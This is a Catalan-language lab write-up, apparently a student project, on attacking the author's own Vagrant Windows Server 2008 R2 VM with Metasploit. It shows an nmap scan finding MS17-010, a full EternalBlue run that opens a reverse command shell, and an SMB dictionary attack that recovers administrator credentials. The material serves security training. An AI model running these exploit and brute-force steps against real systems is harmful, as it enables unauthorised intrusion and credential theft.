## 2. Accedir als dispositius descoberts:

### 2.1. Escaneig de vulnerabilitats

Abans d'accedir a la màquina que tenim per objectiu, hem d'identificar com ho podem fer o mitjançant quins ports o aplicacions és més convenient fer-ho. Per això primer revisem a la nostra base de dades quins ports o serveis tenim oberts a la màquina objectiu:

```
msf5 > services 192.168.0.21
Services
========

host          port   proto  name           state  info
----          ----   -----  ----           -----  ----
192.168.0.21  22     tcp    ssh            open   
192.168.0.21  135    tcp    msrpc          open   
192.168.0.21  139    tcp    http           open   
192.168.0.21  445    tcp    http           open   Windows 2008 R2 Standard SP1 (build:7601) (name:VAGRANT-2008R2) (workgroup:WORKGROUP ) (signatures:optional)
192.168.0.21  3389   tcp    ms-wbt-server  open   
192.168.0.21  49152  tcp    unknown        open   
192.168.0.21  49153  tcp    unknown        open   
192.168.0.21  49154  tcp    unknown        open   
192.168.0.21  49155  tcp    unknown        open   
192.168.0.21  49156  tcp    unknown        open   
192.168.0.21  49157  tcp    unknown        open   
```

En aquest cas, a part de veure que és una màquina Windows, veiem que alguns dels ports oberts són el 22 que pertany al servei SSH, el 139 i 445 que pertanyen al servei SMB, el 135 que pertany al msrpc, el 3389 que s'utilitza per a l'escriptori remot de Windows o el Terminal Server, i la resta que són ports dinàmics. Dels 3 primers serveis que hem pogut reconèixer, intentarem atacar el servei SMB pel port 445, ja que d'entre les opcions que tenim, sol ser el més fàcil.

Ara que ja hem decidit quin port atacarem, executarem primer de tot un escaneig amb nmap per trobar possibles vulnerabilitats al port 445:

```
msf5 > nmap --script smb-vuln* -p 445 192.168.0.21
[*] exec: nmap --script smb-vuln* -p 445 192.168.0.21

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 09:44 EDT
Nmap scan report for 192.168.0.21
Host is up (0.00049s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:F7:55:D2 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 18.64 seconds
```

En el resultat de la comanda anterior, podem veure que s'ha trobat una vulnerabilitat en el port 445:

```
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
```

Com podem veure, ens diu que el port té la vulnerabilitat MS17-010.


### 2.2. Aprofitar les vulnerabilitats 

2.2.1. Ms-17-010:

Com hem vist a l'anterior punt, el port 445 té una vulnerabilitat. Per tant busquem primer de tot si a metasploit hi ha algun mòdul que pugui explotar aquesta vulnerabilitat:

```
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/doublepulsar_rce           2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```

En aquest cas utilitzarem el mòdul "ms17_010_eternalblue". Aquest mòdul intentarà explotar aquesta vulnerabilitat, i crear una sessió a la màquina objectiu. Primer de tot carreguem el mòdul:

```
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > 
```

Un cop ja tenim carregat el mòdul el configurarem, primer de tot establint l'adreça ip de la màquina objectiu:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.0.21
rhosts => 192.168.0.21
```

I després establint quin objectiu (target) volem atacar amb la comanda "set target". En el cas que no sapiguem quins són els possibles objectius que podem atacar, podem veure-ho amb la comanda "show target" (encara que en aquest cas només tenim un sol objectiu escanejat i per tant no en trobarem més):

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set target 0
target => 0
```

Una vegada configurat el mòdul, ja el podem executar:

```
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.0.19:4444 
[*] 192.168.0.21:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.21:445      - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.21:445 - Connecting to target for exploitation.
[+] 192.168.0.21:445 - Connection established for exploitation.
[+] 192.168.0.21:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.21:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.0.21:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.0.21:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
[*] 192.168.0.21:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.0.21:445 - 0x00000030  6b 20 31                                         k 1             
[+] 192.168.0.21:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.21:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.21:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.21:445 - Starting non-paged pool grooming
[+] 192.168.0.21:445 - Sending SMBv2 buffers
[+] 192.168.0.21:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.21:445 - Sending final SMBv2 buffers.
[*] 192.168.0.21:445 - Sending last fragment of exploit packet!
[*] 192.168.0.21:445 - Receiving response from exploit packet
[+] 192.168.0.21:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.21:445 - Sending egg to corrupted connection.
[*] 192.168.0.21:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.21:49159) at 2020-05-02 08:49:38 -0400
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>
```

En el cas que hagi funcionat veurem una sortida com la del codi anterior. Per tant ara ja tenim una sessió creada a la màquina objectiu i per tant podem executar comandes:

```
C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::817f:cd48:d8cf:cdf7%11
   IPv4 Address. . . . . . . . . . . : 192.168.0.21
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.0.1

Tunnel adapter isatap.{2A2DD292-C661-4BC0-B831-EBB832B211F9}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>hostname
hostname
vagrant-2008R2
```

2.2.2. Atac de diccionari:

Si ens trobéssim en la situació en la qual l'anterior mètode no hagi funcionat, o no s'hagi pogut utilitzar perquè el host objectiu no tenia cap vulnerabilitat al port, sempre podem recórrer el mètode d'atac de diccionari. Aquest mètode consisteix a fer nombrosos intents d'inici de sessió fins que trobem la combinació correcta d'usuari i contrasenya. A més, hem de ser nosaltres qui li proporcioni al programa la llista d'usuaris i contrasenyes. Per tant podríem agafar unes llistes més grans d'usuaris i contrasenyes per tenir més probabilitats de tenir èxit amb aquest atac, encara que trigarà més, ja que les llistes són més extenses. O pel contrari agafar fitxers més petits perquè el procés sigui més ràpid i no trigui tant a acabar, però llavors tenim menys possibilitats que aquest atac funcioni, ja que la combinació d'usuari i contrasenya podria no estar en aquestes llistes. En aquest cas utilitzarem llistes bastant extenses, ja que encara que el procés sigui més llarg tindrem més probabilitats de tenir èxit.

També hem de tenir en compte que és un tipus d'atac més "sorollós", ja que els intents d'inici de sessió podem emmagatzemar-se en els logs del sistema i algú podria adonar-se'n del que intentem fer. En aquest cas no ens preocupa això, ja que estem atacant una màquina pròpia.

Per realitzar l'atac de diccionari, ho podem fer utilitzant un dels propis mòduls de metasploit, "smb_login":

```
msf5 > use auxiliary/scanner/smb/smb_login 
msf5 auxiliary(scanner/smb/smb_login) >
```

Si mirem les opcions d'aquest mòdul, veurem que té més variables que hem de definir abans de poder executar-lo. Les variables que definirem en aquest cas són les següents:
- RHOSTS: Adreça ip de la màquina objectiu
- USER_FILE: Fitxer que conté els usuaris amb els quals provarà a iniciar sessió
- PASS_FILE: Fitxer que conté les contrasenyes amb les quals intentarà iniciar sessió
- USER_AS_PASS: Amb aquesta variable indiquem que intenti iniciar sessió amb contrasenyes que siguin el mateix nom que el de l'usuari
- DB_ALL_USERS i DB_ALL_PASS: Amb aquesta variable emmagatzemarà els resultats a la base de dades
- VERBOSE: Aquesta opció ens mostra tots els intents que va fent (la deshabilitarem)

Els fitxers utilitzats com a llista d'usuaris i contrasenyes per a aquest cas es poden trobar dins el directori [dictionary-attack](.\dictionary-attack).

```
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.0.21
rhosts => 192.168.0.21
msf5 auxiliary(scanner/smb/smb_login) > set user_file /home/kali/Documents/m14-projecteasix/brute-force/users.txt
user_file => /home/kali/Documents/m14-projecteasix/brute-force/users.txt
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /home/kali/Documents/m14-projecteasix/brute-force/passwords.txt
pass_file => /home/kali/Documents/m14-projecteasix/brute-force/passwords.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_as_pass true
user_as_pass => true
smsf5 auxiliary(scanner/smb/smb_login) > set db_all_users true
db_all_users => true
msf5 auxiliary(scanner/smb/smb_login) > set db_all_pass true
db_all_pass => true
msf5 auxiliary(scanner/smb/smb_login) > set verbose false
verbose => false
```

Un cop està tot configurat executem l'exploit:

```
msf5 auxiliary(scanner/smb/smb_login) > run

[+] 192.168.0.21:445      - 192.168.0.21:445 - Success: '.\vagrant:vagrant' Administrator
[+] 192.168.0.21:445      - 192.168.0.21:445 - Success: '.\administrator:vagrant' Administrator
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Després d'unes quantes hores ha acabat el procés amb èxit. Ha trobat dos usuaris i contrasenyes que coincideixen amb les llistes que li hem proporcionat: "vagrant:vagrant" i "administrator:vagrant". Ara que ja hem aconseguit les credencials de dos usuaris, i com que hem habilitat prèviament l'opció perquè les guardi a la base de dades, les podem veure sempre que ho necessitem amb la comanda "creds":

```
msf5 auxiliary(scanner/smb/smb_login) > creds
Credentials
===========

host          origin        service        public         private  realm  private_type  JtR Format
----          ------        -------        ------         -------  -----  ------------  ----------
192.168.0.21  192.168.0.21  445/tcp (smb)  vagrant        vagrant         Password      
192.168.0.21  192.168.0.21  445/tcp (smb)  administrator  vagrant         Password  
```

Com podem veure, aquesta comanda ens permet visualitzar les credencials que tenim emmagatzemades a la nostra base de dades. Podem consultar a quin host pertanyen les credencials, a quin servei o port, l'usuari i la contrasenya per accedir-hi.

